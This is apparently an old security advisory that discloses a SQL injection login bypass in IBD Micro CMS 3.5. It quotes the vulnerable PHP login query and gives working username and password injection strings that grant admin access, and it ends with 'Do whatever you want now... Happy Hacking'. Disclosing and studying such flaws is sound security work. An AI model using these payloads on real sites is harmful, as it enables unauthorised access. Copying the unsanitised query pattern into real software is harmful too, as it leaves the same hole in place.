____________________________________________________________________________
____________________________________________________________________________

01010111 01001001 01010010 01000101 01000100  01010011 ->
01000101 01000011 01010101 01010010 01001001  01010100 ->
01011001                                                      

____________________________________________________________________________
ADVISORY: IBD MICRO CMS 3.5 SQL INJECTION (LOGIN BYPASS)
____________________________________________________________________________

_____________________
|| 0x00: ABOUT ME
|| 0x01: DATELINE
|| 0x02: INFORMATION
|| 0x03: EXPLOITATION
|| 0x04: RISK LEVEL

____________________________________________________________
____________________________________________________________

_________________
|| 0x00: ABOUT ME

Author: SkyOut
Date: May 2008
Website: http://wired-security.net/

_________________
|| 0x01: DATELINE

2007-05-09: Bug found
2007-05-10: Advisory released

____________________
|| 0x02: INFORMATION

The content management system Micro CMS in version 3.5 and maybe lower versions
suffers from a SQL Injection bug, that makes it possible to log into the admin
interface without knowing the credentials.

First off, where can you find the tool:
http://www.impliedbydesign.com/ibd-micro-cms-static-content-manager.html

Direct download:
http://www.impliedbydesign.com/files/software_downloads/microcms/microcms.zip

They have still taken down their demo site because of security issues. Seems they
realized, that there are some bugs, but instead of fixing them, they just keep the tool
online and free for download!

To make this bug exploitable "magic_quotes_gpc" has to be turned "Off"!

So let's look at the bug now...

_____________________
|| 0x03: EXPLOITATION

When you download the file microcms.zip and extract it you have the following things your
directory:

Folder: micro_cms_files, microcms_subdirectory_example
Files: microcms-admin-home.php, microcms-admin-login.php, microcms-index.php

Let's look into the microcms-admin-login.php file:

--- SNIP ---
if ($_POST['action'] == 'admin_login') {
  $i = 0;
  if (!$_POST['administrators_username']) {
    $error[$i] = "Please enter your username.";
    $i++;
  }
  if (!$_POST['administrators_pass']) {
    $error[$i] = "Please enter a password.";
    $i++;
  }
  if ($i == 0) {
--- SNIP ---

Via the variable $i the tool checks if both, username and password, have been
set, if so an if-clause gets opened and here we go:

--- SNIP ---
if ($i == 0) {
  $sql = '
    SELECT *
    FROM microcms_administrators
    WHERE administrators_username = "' . $_POST['administrators_username'] . '" and
      administrators_pass = PASSWORD("' . $_POST['administrators_pass'] . '")';
  $user_result = mysql_query($sql);
        
  if (mysql_num_rows($user_result) < 1) {
    $error[$i] = "That username and password don't match, please try again.";
    $i++;
  } else {
--- SNIP ---

Here we have the SQL Injection. The query gets built in the variable $sql = '' and finally executed
via mysql_query($sql);, the result gets saved in $user_result. If the value is less then 1 an error
has occurred, if not...

So what do we have to set for username (administrators_username) and password (administrators_pass)?

Username is simple: Just input " or "1" = "1 ... this will make the query look right, but not for the
password, it is a bit more tricky because of the PASSWORD(); function.
Password will then be this: ") or "1" = "1" or PASSWORD("

All in all we have:

--- SNIP ---
  $sql = '
    SELECT *
    FROM microcms_administrators
    WHERE administrators_username = "" OR "1" = "1" and
      administrators_pass = PASSWORD("") or "1" = "1" or PASSWORD("")';
---SNIP ---

And finally we execute this and get the following:

--- SNIP ---
$admin = mysql_fetch_array($user_result);
$_SESSION['microcms_admin_username'] = $admin['administrators_username'];
$_SESSION['microcms_admin_password'] = $admin['administrators_pass'];
$_SESSION['microcms_admin_email'] = $admin['administrators_email'];
$_SESSION['microcms_admin_id'] = $admin['administrators_id'];
$_SESSION['microcms_admin_level'] = $admin['administrators_level'];
header("Location:microcms-admin-home.php");
$main_content = '<h2>You have successfully logged in!</h2><p>You may now navigate to the \
page whose content you would like to change.</p>';
--- SNIP ---

Alright, we are logged in! Hacked!
Do whatever you want now...

___________________
|| 0x04: RISK LEVEL

- HIGH - (3/3) -

<!> Happy Hacking <!>

____________________________________________________________________________
____________________________________________________________________________